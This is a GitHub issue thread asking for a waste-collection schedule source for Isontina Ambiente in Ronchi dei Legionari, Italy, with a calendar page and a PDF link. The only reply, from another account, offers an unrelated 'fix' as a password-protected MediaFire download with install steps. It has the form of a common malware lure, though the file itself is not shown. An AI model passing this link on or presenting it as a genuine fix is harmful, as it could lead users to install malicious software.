### ISSUE TITLE
[Source Request]: Isontina Ambiente, Italy

### ISSUE THREAD

**Issue by riddik14** [mampfes/hacs_waste_collection_schedule#2593]
### Municipality / Region

Ronchi dei legionari

### Collection Calendar Webpage

https://isontinambiente.it/it/servizi/servizi-per-il-tuo-comune/ronchi-dei-legionari/?indirizzo=27

### Example Address

Ronchi dei legionari, via delle boschete, 4

### Collection Data Format

As html on a webpage, As PDF Download

### Additional Information

https://isontinambiente.it/media/calendari_pdf/A4_2022_STAMPA_B.pdf

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
